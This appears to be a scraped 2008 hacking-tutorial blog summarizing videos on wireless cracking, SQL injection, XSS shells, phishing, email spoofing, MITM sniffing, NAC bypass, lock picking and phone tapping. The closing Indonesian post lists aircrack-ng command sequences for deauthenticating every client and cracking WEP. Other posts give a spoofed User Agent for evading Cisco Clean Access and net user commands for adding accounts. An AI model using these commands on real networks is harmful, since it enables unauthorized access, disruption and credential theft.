Search Hacking Mode Trick Updates

Wireless Hacking - Cracking WEP

Friday, December 5, 2008 · 0 comments

The second episode of Full Disclosure is now released. This episode includes how to crack WEP encryption, and why it is so easy to crack. The shownote are published in the wireless hacking section of the forums.

Download video here

Read More......

Wireless Hacking - DeAuth

· 1 comments

The third episode of Full Disclosure is a short one; however, it is a necessary step in cracking WPA-PSK which will be our next video. Basically this attack just disconnects all the users on a wireless network. The attacker does not need to know the WEP or WPA key or be connect to the network. This attack is illegal in many states, so this video is for education reasons only.

Download video here

Read More......

Lock Picking - Bump Key

· 1 comments

This is the first of our Lock picking series. In this episode we describe how to make and use a bump key to quickly unlock most residential grade locks.

Download video here (Right Click -> Save Link as)
Video Shownotes here



Read More......

Phone Phreaking - Beige Box

· 0 comments

This episode of Full Disclosure we are demonstrating how to tap a phone line with the old school Beige Box! We are planning to have many Phone Phreaking (telephone hacking) episodes like Sniffing VOIP, Hacking COCOT, and Red Boxing to name a few.


Download video here (Right Click -> Save Link as)



Read More......

Phone Phreaking/Network Hacking - Sniffing VoIP

· 0 comments

Our seventh episode is a mix between Phone Phreaking and Network Hacking. In this episode we demonstrate how to sniff Voice Over IP conversations, which basically means how to tap an internet phone. We thought that this would be a good video to follow the beige box.


Download video here (Rig

Read More......

Lock Picking - DIY Padlock Shims

· 0 comments

This is our second video in our Lock picking series. In this video we explain how to make and use Padlock Shims. Padlock Shims are used to unlock spring latch Padlocks.

Download video here (Right Click -> Save Link as)

Read More......

Lock Picking - Mult-Disc Combo Locks

· 0 comments

This is our third video in our Lock Picking series; after this video we will return to computer hacking videos for a while. In this video we demonstrate how to unlock the Master Lock 653D, Targus Defcon CL, and the Master Lock 175. The different methods shown in this video to unlock these three locks will help you not only unlock these locks; but also, help you develop your own way to crack other mult-disc combo locks that you may come across.

Download video here (Right Click -> Save Link as)

Read More......

Local Privilege Escalation Vulnerability in Cisco VPN Client

· 0 comments

Recently a local privilege escalation vulnerability was found in Cisco’s VPN Client. When Cisco VPN Client is installed, a windows service “Cisco Systems, Inc. VPN Service” is created. The service runs the binary C:\Program Files\Cisco Systems\VPN Client\cvpnd.exe as Local System. Therefore, if you replace cvpnd.exe with another executable, then that program will be ran at startup with root privileges! I fond this vulnerability interesting because it is used at my college to authenticate students when they connect to the wireless network. For that reason, almost every student with a laptop has this software installed, and students are allowed to borrow school laptops from the student center to use the wireless internet. Consequently, anyone could borrow a laptop, gain root access thought the vulnerability, and install a keylogger that sends every keystroke to the attacker’s email! Its been 5 days seen this vulnerability was discovered, and Cisco has already issued a patched version. However, how long will it take for the school to update all their computers? This is just another reason why you should be careful when using school computers!

Video Demonstration: (shows how to gain root access and change the Admin password with this vulnerability)


Read More......

Hacking Basics - MD5

· 0 comments

In this episode of Full Disclosure we will demonstrate how to crack MD5 password hashes. MD5 (Message-Digest algorithm 5) is a hash function commonly used by websites to encrypt passwords. MD5 is a one-way hash; therefore, to crack the password you most try every possible dictionary word and if that does not work, every possible letter/number/symbol combination. The programs we use to crack the passwords are Cain and MDCrack-NG.


Download video here (Right Click -> Save Link as)



Read More......

Website Hacking - Sql Injection

· 0 comments

For Infinity Exists Full Disclosure’s first Website Hacking episode, we demonstrate how to exploit a security vulnerability occurring in a website’s database to extract password hashes. Sql (Structured Query Language) is a computer language designed for the retrieval and management of data in a system’s database. The Attack, known as Sql Injection, manipulates Sql statements before they are sent to the Sql Server, allowing the Attacker to create, change, or retrieve data stored in the database. Sql Injection is a hard concept to understand, so we made a video that encompasses all our knowledge on the subject to make it easier for our viewers to grasp.


Download video here (Right Click -> Save Link as)



Read More......

Hacking Basics - Backtrack

· 0 comments

On the forums, there has been many questions concerning Backtrack. Therefore, we decided to make a video that tries to answer as many as these question as possible. In this episode we cover: Where to get Backtrack 2, How to burn an .ISO file, How to boot Backtrack 2, How to login, and start the GUI interface. Also, we illustrate basic Linux commands, and how to set up your Network Interfaces.


Download video here (Right Click -> Save Link as)



Read More......

How to use Intel Pro/Wireless 3945ABG in Backtrack 2

· 0 comments

The Intel Pro/Wireless 3945ABG (IPW3945) is a popular wireless card that is build-in many laptops. However, the drivers included in Backtrack 2 do not allow you to do packet injection. To fix this problem you need to install the IPWRAW drivers. The easy way to do this is to use Backtrack 2 module. A module adds additional components to Backtrack 2. To add a module, you copy the .LZM file into the modules folder in the BT2 .ISO. After adding the IPWRAW module to the BT2 .ISO, boot up Backtrack and click the “IPW3945 RAW load.sh” script on the desktop to install the IPWRAW Drivers. After the drivers are installed your wireless card will be lock in monitor mode, and you will be able to do packet injection with aireplay-ng. If you want to put your wireless card in managed mode and connect to a wireless network click the “IPW3945 load.sh” script on the desktop. That script will load the default IPW3945 Drivers.

Video Demonstration


Download IPWRAW Module Here
Discuss Here

Credit:
IPWRAW package made by: -~operator~-
Module made by: Genius


Read More......

How to use Intel Pro/Wireless 3945ABG in Backtrack 2

· 0 comments

The Intel Pro/Wireless 3945ABG (IPW3945) is a popular wireless card that is build-in many laptops. However, the drivers included in Backtrack 2 do not allow you to do packet injection. To fix this problem you need to install the IPWRAW drivers. The easy way to do this is to use Backtrack 2 module. A module adds additional components to Backtrack 2. To add a module, you copy the .LZM file into the modules folder in the BT2 .ISO. After adding the IPWRAW module to the BT2 .ISO, boot up Backtrack and click the “IPW3945 RAW load.sh” script on the desktop to install the IPWRAW Drivers. After the drivers are installed your wireless card will be lock in monitor mode, and you will be able to do packet injection with aireplay-ng. If you want to put your wireless card in managed mode and connect to a wireless network click the “IPW3945 load.sh” script on the desktop. That script will load the default IPW3945 Drivers.

Video Demonstration


Download IPWRAW Module Here
Discuss Here

Credit:
IPWRAW package made by: -~operator~-
Module made by: Genius


Read More......

Sql Injection Challenge!

· 0 comments

I’m proud to announce the first Infinity Exists’ Hacking Challenge! The challenge is to find a Sql Injection flaw in our forums, and exploit it to extract password hashes. The first person to complete this challenge will receive a free Infinity Exists T-shirt. The Sql Injection vulnerability is hidden deep in Infinity Exists’ forums, and will be much harder to find then the vulnerability demonstrated in Full Disclosure Episode 11. Tips to help you get started:

  1. Watch Full Disclosure Episode 11!
  2. Download Wp-Forums Source Code
  3. The variable that is used to manipulate the Sql Statement is a POST variable.
Good Luck!
—————————————————————————————————————————–
Update!
marcel.romard and esc both won Infinity Exists’ Sql Injection Challenge!! Marcel.romard found the Sql injection flaw in the forum’s search that this challenge was based around. Esc found a Sql Injection flaw that we were unaware of in the forum’s RSS feed. Congrats to both of you!

Read More......

Sql Injection Challenge How-to

· 0 comments

The Sql Injection Challenge has already been completed, so here is a video demonstration on how to find this Sql Injection flaw and exploited it to extract password hashes. In this video I use a firefox plugin ‘Data Tamper’ that can be download here


Full Size Video
Download Here

Read More......

SIUC’s Network

· 0 comments

I currently attend Southern Illinois University at Carbondale, and I am taking Digital Circuit Design with Dr. Weng who also teaches Network Processing Systems Design. Today in class he invited all his students to go a tour of SIUC’s computer network with his Network Processing Systems class. Of course I took up his often because it is not every day a regular student can walk into the core networking room and server mainframe of a large University. Basically, the network is system up on a three layer infrastructure (Core Layer, Distribution Layer, Access Layer). At the Access Layer (which is the layer that provides network access to client computers) the University uses Cisco Catalyst 2950 switches. Those switches are connected via cross-over cable to the Distribution Switch which is a Cisco Catalyst 3524. In turn, the Distribution switch connects via fiber wire to the Core Switch which is a Cisco Catalyst 6509. The entire can network runs at 1 Gigabyte; however, the internet bandwidth is capped at 300 Mb! Furthermore, only 90 Mb of bandwidth is dedicated to the Residence Halls!! All the Core Switches goto the student center where the internet point of entry is located. Also, internet traffic is filtered through a SourceFire firewall. Some more interesting networking facts: SIUC has 9 Wireless AP (I believe) which are managed by a Cisco Wireless LAN Controller, for access control they use Cisco 1111, for VPN they use Cisco VPN Concentrator 3000, and for their servers they use Sun System SunFire. A interesting security fact is that they only use SSH to configure switches remotely because the web interface has security issues. Lastly, you probably noticed that most of their networking devices are Cisco this is for compatibility reasons, they had problems in the past for using multiple vendors. Well thats about it, hope you enjoyed hearing about SIUC’s Network.

Typical Network Layout of a SIUC Building:

My Dorm’s Network Layout:

Read More......

Infinity Exists Featured On 60 Minutes

· 0 comments

CBS’s 60 Minutes ran a segment on internet insecurities and they showed the ease of finding tutorials on youtube to exploit them. They chose our video on cracking WEP to demonstrate and showed a short clip of it. The segment is up on the CBS website and you can check it out here. Thank you CBS for the free publicity!
—————————————————————————————————————————– Update - Live Stream



Read More......

Website Hacking - XSS

· 0 comments

In this episode of Full Disclosure we are explaining the website attack known as Cross-Site Scripting (XSS). Cross-Site Scripting is a type of security vulnerability that affects web applications that do not sanitize user input properly. This kind of vulnerability allows an “attacker” to inject HTML or client side script like JavaScript into the website. Cross-Site Scripting is most commonly used to steal cookies. Cookies are used for authenticating, tracking, and maintaining specific information about users; therefore, by stealing a user’s cookies an attacker could bypass the website’s access control. There are three types of XSS attacks: Persistent, Non-Persistent, and DOM-Based. In this episode we will cover Persistent and Non-Persistent Cross-Site Scripting attacks.


Download video here (Right Click -> Save Link as)

Read More......

The 60 Minutes Effect

· 0 comments

As most of you already know, Infinity Exists’ Full Disclosure Ep. 2 Wep Cracking was featured on CBS’s 60 Minutes “High-Tech Heist” for about 10 seconds. Those few seconds on Nation Television gave us about 40,000 hits on YouTube, and about 750 unique hits on InfinityExists.com. Weeks after the 60 minutes episode aired Infinity Exists is still getting an average of 300 unique hits a day. This is pretty good compared to our 200 hit average before.



However, 60 Minutes brought Infinity Exists to the attention of a few unwanted people. For Example:



People that do not understand what it is to be a hacker, just simply think we are criminals. A Hacker truly is a computer enthusiast that enjoys exploring various computer systems in the pursuit to gain more knowledge. A hacker’s goal is never to harm anyone or anything as the media would like you to believe. The goal of Infinity Exists’ video series Full Disclosure is to inform people about specific security flaws. If there was no one to disclose this information to the general public then everyone would still being using insecure technology and would be at the mercy of criminal crackers.

Read More......

Exploit Hacking

· 0 comments

Since Infinity Exists hasn’t had time to release a new episode, I decided to revamp a two part series, Exploit Hacking and Exploit Hacking 2 - Privilege Escalation, that I made a year before Infinity Exists was created. It may be a little dated, but it provides great information on how a hacker can find an vulnerability on a remote computer and exploit it to gain remote access. Also, the video shows how a hacker can raise their privileges on the remote machine to administrator. I added text throughout the video to make it easier to understand. Furthermore, Infinity Exists plans to do a more up-to-date and more detailed series of episodes on “exploit hacking.”


Full Scale Video Here
Download Here

Read More......

USB Worm (Jamesgo.dll)

· 0 comments

The other day my computer was infected by a USB Worm known as Jamesgo.dll. I received the virus when I inserted my girlfriend’s USB thumb drive. The worm modified the autorun.inf file on the thumb drive, so it was able to automatically transfer itself to all my hard disk drives (Click Here to view autorun.inf). There is little information on the internet about this virus, so I had to figure out my own way to remove it. By analyzing the autorun.inf (which the virus cleverly changed to a system hidden file, and later I found out that it modified the registry so system hidden files are never displayed) I disclovered that each drive contains the Visual Basic Script, test.vbs (Click Here to view Test.vbs). Basically what the file does is copies test.bat, test.reg, autorun.inf, autorun.ico, and itself to every hard disk in the system. Also, it runs every 60 seconds, so if you delete it from one drive in 60 seconds it will recopy itself from a different drive. Futhermore, the test.reg simply edits the registry so test.bat runs on start up and prevents system hidden files from being displayed. Test.bat runs the VB script and changes the files to system,hidden,achieved, and read-only (Click Here to view Test.reg and Click Here to view Test.bat). To remove the virus I crafted a batch file changes all the test files and autorun to normal files (attrib -s -h -r test.*, attrib -s -h -r autorun.*), and then deleted them. Since the batch file can delete all the files quickly it does not have a chance to recopy itself to all the disk drives. Also, I manually removed all entires of test.bat from the registry (Click Here to view Fix)

To prevent a USB Worm from infecting your computer:
1) Goto Start -> Run
2) Type “gpedit.msc” (This is the group policies editor)
3) Click “Administrative Templates” under Computer Configuration
4) Then click “System”
5) Select “Turn off Autoplay”
6) Set it to “Enable” and choose to “Turn off Autoplay on All Drives”


In conclusion, the Jamesgo.dll USB Worm is not a risk for your computer, but it is really annoying! Also, it is a perfect example on how easy it is to create a Worm for travels though removal media. If you want to mess around and modify the Jamesgo.dll script you can download it here. If you want to learn more on how to use Autorun and Batch files to create a “Auto Hacking USB Thumb Drive” go here.

Interesting Note: The Jamesgo.dll USB Worm was created in the Philippines which is stated in test.vbs, and the Thumb Drive that infected my computer was purchased in the Philippines and brought back to the US by my girlfriend’s mother.

Read More......

Staying Secure - SSH Tunnel

· 0 comments

The wait is finally over! This new episode of Full Disclosure shows you how to use a SSH Tunnel to secure your data when you are on an untrusted LAN (ex. Coffee Shop, School’s network, or Defcon). Furthermore, you can use the SSH Tunnel to bypass the LAN’s internet filters. The SSH tunnel protocol works by encapsulates your data into an encrypted payload and transmitting it to the SSH Server which is setup on a trusted LAN.

Live Stream Here
Download Here

Links:
OpenSSH for Windows, Putty, Proxifier

Read More......

Wireless Hacking - Cracking WPA

· 0 comments

This episode of Full Disclosure illustrates the progress of Cracking weak WPA Preshared Keys. Before you can crack the Preshared Key you must capture the four way handshake between the Access Point and a client; to accomplish this you must force the client to reconnect to the AP with the DeAuthentication attack we showed in episode 3. If you are using the Linksys WUSB54GC you will have to update your drivers to RaLink RT73 USB Enhanced Driver. In this episode we show you how to do this, and I also made a Backtrack module to automate the process. The module works in the same way as the IPWRAW Module for the Intel Pro/Wireless 3945ABG card, so you can watch that Vblog if you are having troubles.

Live Stream Here
Download Here

Download RT73 Module Here
Watch IPWRAW Vblog Here

Read More......

Singing Tesla Coil

· 0 comments

This weekend was UIUC’s annual Engineer Open House, and last night there was a Singing Tesla Coil show. The Tesla coils were built by Steve Ward, a EE student at UIUC. “Steven has developed Tesla Coils with high levels of control allowing audio modulation of their lightning-like display. Interfacing the Continuum Fingerboard with this technology will generate a musically expressive and highly energetic, multi-voiced performace” (EOH Exhibit Guide).

Full Scale Video Here
Download Here

Read More......

McAfee SiteAdvisor

· 0 comments

An anonymous viewer brought to my attention that McAfee’s so called “SiteAdvisor” had labeled Infinityexists.com with the big evil red X

It turns out that McAfee SiteAdvisor scanned Infinity Exists and found the Jamesgo.dll Worm, which I uploaded so you guys can see how it works. Not only is the virus zipped to prevent anyone from accidentally running it, but also, there is an explanation on how to remove the virus in the blog post.

(I have to agree with the Nuisance ‘O Meter. Jamesgo is definitely an 8!)

Don’t get my wrong, I think it is a good idea for McAfee to try to inform non-techie computers users that those free screensavers are going to mess up their computer. I just think McAfee should take into account the content of the website instead of just blindly scanning the internet for viruses. Now people interested in computer hacking will be disinclined to visit Infinity Exists because they’ll see this:

Well anyways, that my rant on McAfee SiteAdvisor

Read More......

Tapping a 66 Block Telephone Network Interface

· 0 comments

Awhile ago I was asked to rewiring a company’s 66 Block, a type of punchdown block used to connect sets of wires in a telephone system, because they wanted to replace their plain old telephone service (POTS) with multiple VoIP telephone lines. I had little knowledge on the 66 Block before doing this job, so I got out my trusty Beige Box to figure out how it was wired. Here’s a short video on how to tap a 66 Block. (Watch Episode 6 if you need help making a Beige Box)

Full Scale Video Here
Download Here

Read More......

Triple Boot - Windows, Backtrack, & Ubuntu

· 0 comments

For episode 17, we demonstrate how to triple boot a computer with Windows, Backtrack, and Ubuntu. Nox and I go through the process of setting up the various disk partitions, installing Backtrack and Ubuntu to different partitions, and how to configure your computer to boot between each of the Operating Systems. Hopefully, this episode will give you guys insight on how to go about multibooting your computer with several different OSs.

Live Stream Here
Download Here

Download Backtrack
Download Ubuntu

Read More......

Dual Boot - Windows & Backtrack

· 0 comments

We said we would release a Vblog on how to Dual boot Windows and Backtrack so here it is. The process is slightly different, there is not need for an extended partition because you only need four primary partitions, and we use Lilo for the boot loader. Since we aren’t installing Ubuntu we have to manually create and configure the linux swap partition. Also, we have to manually configure Lilo; however, this allows us to change the Splash image when your computer starts.

Full Scale Video Here
Download Here

Read More......

Local Password Cracking

· 0 comments

In this addition of Full Disclosure, Nox and I show you how to crack local Linux and Window’s passwords. Furthermore, we explain how to reset and restore Linux or Window’s password for temporary access to a computer. There are different trade-offs for each method of bypassing local passwords. Cracking a password can take a long time, but knowing the password may help you gain access to other computers and programs. Reseting and Restoring a password is quick because you don’t need to know the password, but you will have to repeat this method every time you want access to the computer.

Live Stream Here
Download Here

Ophcrack
Cain

Read More......

Introduction

· 0 comments

Infinity Exists Underground is a new video series based completely on viewer submissions. If you have an educational video on hacking, lock picking, modding, etc. send an email explaining what your video is about to underground@infinityexists.com. Nox and I will review the emails and if it sounds like a good informative video we will give you access to the video upload page so you can submit your video. We may edit your video slightly to make it clearer, but you will get credit for creating the video. Also, you can remain anonymous if you are making a questionable video. We hope to get many viewer submissions so that we can get more content on the site and also get you guys more involved.

Full Scale Video Here
Download Here

Read More......

Lock Picking Basics

· 0 comments

Our 19th video is a continuation of our lock picking series. In this episode, we explain how to pick a deadbolt lock using the Lifter Picking method.

Live Stream here
Download video here

Read More......

Email Spoofing

· 0 comments

The first Underground video explains how to send fake emails a.k.a. Email Spoofing. This video, submitted by Crash Overron, covers two methods of email spoofing. The first and older method is connecting directly to the SMTP server with Telnet; however, this method is usually blocked by the email provider. The second method, utilizes the Mail() function in php. Full Scale Video Here
Download Here

Download Email_Spoof.php
(Right Click -> Save As Email_Spoof.php)

Read More......

Metasploit Autopwn

· 0 comments

In this Underground Video, Copy explains how to use Metasploit’s Autopwn. The Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. Autopwn is a tool in Metasploit Framework version 3 that automates the exploitation process. Copy demonstrates how to use Autopwn in both Backtrack 2 and Backtrack 3. Full Scale Video Here
Download Here

The Metasploit Project
For more information on the Metasploit Framework check out my Exploit Hacking video.

Read More......

Recovering an Acer Computer

· 0 comments

Last Thursday, my Acer Travelmate laptop crapped out on me and stopped booting Windows XP. I tried everything to fix it: booting into safe mode, using Windows recovery console to fix the boot.ini, fixing the corrupted partition boot sector with Fixboot, and fixing the Master boot record with Fixmdr. I even tried to reinstall windows, but it still wouldn’t boot! So I decided I would just backup all my stuff with a liveCD, format the drive, and use the recovery cd to start all over. Guess what? Acer doesn’t ship their laptops with a Recovery CD; they require you have to burn it yourself when you first get the computer, and of course I was way too lazy to do that. Well after some research I found out there is a hidden recovery partition that the Acer repair people use to fix your computer. If you are having the same problem as me, heres how I accessed the hidden partition and recovered my computer.

1. Boot your computer with the Backtrack liveCD (I used BT2 because it was the only thing I had off hand)
2. Backtrack will automatically mount the hidden drive (sda1). Navigate to it in the /mnt/sda1 folder.
3. Copy mbrwrwin.exe and rtmbr.bin from the /mnt/sda1 folder to the /mnt/sda2 folder (your C drive).
4. Next, you need to run the mbrwrwin install rtmbr.bin command. You can do this a couple different ways: You can use the Windows Recovery Console to run the command, or use a Windows LiveCD like BartPE (http://www.nu2.nu/pebuilder/). I used BartPE because I already tried to re-install windows and I couldn’t access the recovery console because I wasn’t able to set an Administrator password.
5. Restart your computer, and press Alt-F10 at the Acer splash screen. This will bring you to the Acer eRecovery on the hidden partition, and all you have to do is follow the directions to restore the factory settings. (If you can’t access the eRecovery make sure d2d recovery is enabled in BIOS. You can access the BIOS by pressing F2 at the Acer splash screen).
6. After your computer is restored, burn the damn recovery cd so you don’t have to do this next time!!!

For more information check out:
http://forum.notebookreview.com/showthread.php?t=175697
http://forum.notebookreview.com/showthread.php?t=11476

Read More......

Application Patching

· 0 comments

Crash Overron’s second Underground video explains how to use Ollydbg to manipulate a simple program. OllyDbg is a debugger that analyzes binary code. Not only does Olly allow you to step through an executable’s assembly code, but also, it can trace registers, recognize procedures, API calls, switches, tables, constants and strings. Crash Overron utilizes a feature in Olly to locate a referenced text string that is displayed when an invalid serial key is entered. Once the string is located, he can find the compare statement that checks the user’s serial key, and change the flow of the program so that his serial key is accepted. Full Scale Video Here
Download Here

Download Ollydgb
Download Application

Read More......

Ettercap

· 0 comments

For this episode of Full Disclosure, we illustrate the many features of Ettercap. Ettercap is a program designed to sniff passwords on a LAN. It can recognize several different packets that contain passwords including Http, Telnet, Ftp, Pop, Rlogin, SSH1, ICQ, SMB, MySql, NNTP, X11, IRC, IMAP, VNC, SNMP, MSN, YMSG, etc. Furthermore, Ettercap can utilize Man in the Middle Attacks to hijack packets and redirect them to the attacker computer allowing it to extract passwords. In this episode, we show you how to use Arp Poisoning, DHCP Spoofing, and Port Stealing MITM Attacks and explain how they work. Also, we explain how to configure Ettercap to sniff encrypted passwords over the Secure Sock Layer (SSL and HTTPS). Moreover, Ettercap can be easily programmed to modify network traffic with the use of Filters. We demonstrate how to make many different Ettercap Filters. Ettercap comes with numerous plugins to advance Ettercap’s abilities; we explain how to use the Check Poison, Re-Poison, DNS Spoofing, Isolate, DoS Attack, Find IP, Gateway Discover, Search Promisc, Arp Cop, and Scan Poisoners Plugins. Lastly, we demonstrate how to use Ettercap’s Passive OS Fingerprinting feature. Ettercap supports passive dissection of many protocols allowing it to identify a host’s Operating System and Services.

Live Stream Here
Download Here

This Full Disclosure episode is very lengthy, almost 50 minutes, so if you have any questions feel free to ask them on the forums

Download Ettercap (Linux)
Download Ettercap (Windows)

Filters:
Irongeek’s Image Altering Filter
Patchy’s Wordpress Filter
Patchy’s Myspace Filter

Read More......

Windows SMB Relay Exploit

· 0 comments

In this Underground video, Overide demonstrates how to obtain root access on a fully patched Windows XP SP3 Machine. He exploits a flaw in Windows Server Message Block (SMB) which is used to provide shared access to files between hosts on a network. Overide utilizes the Metasploits Framework to run the exploit. It works by relaying a SMB authentication request to another host which provides Metasploit with a authenticated SMB session, and if the user is an administrator, Metasploits will be able to execute code on the target computer such as a reverse shell. For this exploit to run, the target computer must try to authenticate to Metasploit. Overide forces the target computer to perform a SMB authentication attempt by using a Ettercap Filter. Full Scale Video Here
Download Here
Download Ettercap Filter Here

Read More......

Beer Pong Table

· 0 comments

The last few days I’ve been helping my friend Charlie construct his Illinois State University (ISU) Beer Pong Table. The legs and supports of the table are made from his roommate Brandon’s hockey sticks, and the table top is made of plywood with a 1/8″ sheet of Acrylic on top. Our friend Tyler etched ISU’s mascot, Red Bird, into the Acrylic; it was done free-hand with a dremel (Compare his etching to image). Tyler also did the text on the table: “ISU” and ” What you call Addiction … We call Dedication”. I did the LED array and the wiring; when the LEDs are lit, the light catches the etching in the acrylic. The LED controller I made allows you to switch between the LEDs being constantly on or controlled by an audio input. However, the LEDs we used are only lit at a specific voltage, so it doesn’t work very well. Full Scale Video Here
Download Here
Pre-Amp Schematic

Read More......

Beer Pong Table

· 0 comments

The last few days I’ve been helping my friend Charlie construct his Illinois State University (ISU) Beer Pong Table. The legs and supports of the table are made from his roommate Brandon’s hockey sticks, and the table top is made of plywood with a 1/8″ sheet of Acrylic on top. Our friend Tyler etched ISU’s mascot, Red Bird, into the Acrylic; it was done free-hand with a dremel (Compare his etching to image). Tyler also did the text on the table: “ISU” and ” What you call Addiction … We call Dedication”. I did the LED array and the wiring; when the LEDs are lit, the light catches the etching in the acrylic. The LED controller I made allows you to switch between the LEDs being constantly on or controlled by an audio input. However, the LEDs we used are only lit at a specific voltage, so it doesn’t work very well. Full Scale Video Here
Download Here
Pre-Amp Schematic

Read More......

XSS Tunnel

· 0 comments

XSS Shell is a cross-site scripting backdoor into the victim’s browser which enables an attacker to issue commands and receive responses. During a normal XSS attack an attacker only has one chance to control a victim’s browser; however, the XSS Shell keeps the connection between the attacker and the victim open to allow the attacker to continuously manipulate the victim’s browser. XSS Shell works by setting up an XSS Channel, an AJAX application embedded into the victim’s browser, that can obtain commands and send back responses. To enable the XSS Shell an attacker needs to inject the XSS Shell’s Javascript reference by utilizing a XSS flaw on a website. Once the victim’s browser is infected with the XSS Shell and the XSS Channel is created, the attacker can issue instructions to the infected browser. Also, the Attacker can use a XSS Tunnel to transfer HTTP traffic through the XSS Channel and the victim’s browser; in turn, exploiting the victim’s credentials to bypass authentications and IP Restrictions. The XSS Tunnel is a HTTP Proxy that sits on an attacker’s computer, and any tool that is configured to use it will tunnel its traffic through the XSS Channel.

Live Stream Here
Download Here

Download XSS Shell and Tunnel

Read More......

Password Phishing

· 0 comments

Phishing is a method of obtaining sensitive information such as usernames and passwords by pretending to be a trusted website. Tehdead shows us a variety of password phishing techniques that enable an attacker to trick a user into giving up their login information. The first step is to create a fake login identical to the login on the trusted website. In order to not raise suspicion, Tehdead explains two methods to capture the victim’s password and then transfer them to the real website. One method is to sumbit the information to a php page that is disguised as a pop-up advertisment, and the other is to send the username and password to a simular php page that is contained in an iframe. Lastly, Tehdead describes how to use link manipulation with BBcode to social engineer a victim into going to the fraudulent website. Full Scale Video Here
Download Here

Read More......

Bypass Cisco Clean Access & Cisco NAC Appliance

· 0 comments

Cisco NAC Appliance (formerly Cisco Clean Access) is a Network Admission Control (NAC) product that is uses to enforce security policy on computers seeking to access network resources. Therefore, an administrator can force users to comply to a policy that requires the user to install or remove programs. For example, a university I previously attended required students to install McAfee Antivirus Software and remove Peer-to-Peer programs before they were allowed to access the internet.

To bypass Cisco Clean Access a user can simply change their browser’s User Agent to an Operating System that does not require this program [ex. Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.8) Gecko/20050511]. An easy way to change your User Agent in Firefox is to download User Agent Switcher.

With Cisco NAC Appliance, Cisco added additional detection mechanisms such as TCP fingerprinting and JavaScript OS detection, so the User Agent trick will not work. However, by changing the default parameters of the Windows TCP/IP stack the user can still connect to the network without running any host-based checks. You can do this with Kevin.

Video Demonstration:

Full Scale Video Here
Download Here

Read More......

Manipulating Windows User Accounts

· 0 comments

Xauthzx’s Underground video describes how to Create, Delete, and Manipulate Windows user accounts from the command line. Although it is a relatively simple procedure, knowing how to use the Windows net command can be very helpful in many situations.

User Commands
net user – Display User Accounts
net user [Username] * – Change a User’s Password
net user [Username] /del – Delete a User
net user [Username] /add – Add a User
net localgroup – Display Local Groups
net localgroup [Group] [Username] /add – Add User to Local Group

Other Useful Commands
net start – Display Services
net start [Service] – Start Service
net stop [Service] – Stop Service
net share – Manage Shared Folders
net view – Display Network Computers
net view \\[Computer Name] - Display Network Computer’s Shared Folders
net use * \\[Computer Name]\[Shared Folder] – Mount Network Shared Folder

Full Scale Video Here
Download Here

Read More......

Manipulating Windows User Accounts

· 0 comments

describes how to Create, Delete, and Manipulate Windows user accounts from the command line. Although it is a relatively simple procedure, knowing how to use the Windows net command can be very helpful in many situations.
User Commands
net user – Display User Accounts
net user [Username] * – Change a User’s Password
net user [Username] /del – Delete a User
net user [Username] /add – Add a User
net localgroup – Display Local Groups
net localgroup [Group] [Username] /add – Add User to Local Group

Other Useful Commands
net start – Display Services
net start [Service] – Start Service
net stop [Service] – Stop Service
net share – Manage Shared Folders
net view – Display Network Computers
net view \\[Computer Name] - Display Network Computer’s Shared Folders

Read More......

Episode 12 - Hacking Basics - Backtrack

· 0 comments

On the forums, there has been many questions concerning Backtrack. Therefore, we decided to make a video that tries to answer as many as these question as possible. In this episode we cover: Where to get Backtrack 2, How to burn an .ISO file, How to boot Backtrack 2, How to login, and start the GUI interface. Also, we illustrate basic Linux commands, and how to set up your Network Interfaces.


Download video here (Right Click -> Save Link as)

Read More......

List of compatible adapters BackTrack

· 0 comments

PCMCIA/Cardbus/Express Card
Airlink AWLC4030 Chipset Atheros
Belkin F5D8071 Chipset Atheros
D-Link DWA-643 Chipset Atheros
D-Link DWL-650 Chipset Prism 2.5
D-Link DWL-G630 C2 v3.01 Chipset Atheros
D-Link DWL-G630 E1 Chipset Ralink
D-Link DWL-G650 C3, C4, B5 Chipset Atheros
Linksys WPC55AG v1.2 Chipset Atheros
MSI CB54G2 Chipset Ralink
Netgear WAG511 Chipset Atheros
Netgear WG511T Chipset Atheros
Netgear WG511U Chipset Atheros
Proxim 8470-WD Chipset Atheros
Senao NL-2511 CD PLUS EXT Chipset Prism 2.5
TP-Link TL-WN610G Chipset Atheros
TrendNet TEW-441PC
Ubiquiti SRC Chipset Atheros

PCI/MiniPCI/MiniPCI Express
ASUS WL-138G V2 Chipset Broadcom
ASUS WL-138gE Chipset Broadcom
Canyon CN-WF511 Chipset rt61
D-Link DWL-G550 Chipset Atheros
Linksys WMP54G v4 Chipset Ralink
Linksys WMP54G-UK v4.1 Chipset Ralink
MSI PC54G2 Chipset Ralink
Netgear WG311T Chipset Atheros
Netgear WPN311 Chipset Atheros
Thinkpad 11a/b/g Chipset Atheros
TP-Link TL-WN650G Chipset Atheros
TP-Link TL-WN651G Chipset Atheros
Trendnet TEW-443PI A1 1R Chipset Atheros

USB
Asus WL-167g v2 Chipset Ralink RT73
Airlink AWLL3026 Chipset Zydas zd1211
Alfa AWUS036E Chipset RTL8187L
Alfa AWUS036H Chipset rtl8187
Alfa AWUS036S Chipset Ralink rt73
Digitus DN-7003GS Chipset RTL8187L
D-Link DWL-G122 B1 Chipset Ralink RT2570
D-Link DWL-G122 C1 Chipset Ralink RT73
D-Link WUA-1340 Chipset Ralink RT73
Edimax EW-7318USg Hawking HWUG1 Chipset Ralink rt73
Linksys WUSB54G v4 Chipset Ralink rt2570
Linksys WUSB54GC Chipset Ralink RT73
Netgear WG111 v1 Chipset PrismGT SoftMAC
Netgear WG111 v2 Chipset RTL8187L
TP-Link TL-WN321G Chipset Ralink RT73
Trendnet TEW-429UB C1 Chipset Zydas zd1211b
ZyXEL AG-225H Chipset Zydas zd1211
ZyXEL G-202 Chipset Zydas zd1211b

Banyak yang menyarankan sebaiknya menggunakan Chipset Atheros, BackTrack bakalan lebih jantan ...

Read More......

Perintah untuk Hacking Wi Fi (BackTrack)

· 0 comments

luthfil:
a. Mematikan seluruh Client

aireplay-ng --deauth 10 -c FF:FF:FF:FF:FF:FF -a [AP MAC] ath0

b. WEP crack

airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0
new console
airodump-ng --channel [x] --bssid [x] -w [hasil] ath0
new console
aireplay-ng --arpreplay -b [AP MAC] -h [Client MAC] ath0
new console
aireplay-ng --deauth 5 -c [Client MAC] -a [AP MAC] ath0
aircrack-ng hasil*.cap
aircrack-ptw hasil-01.cap

c. WPA/WPA2 Crack

airmon-ng stop ath0
airmon-ng start wifi0
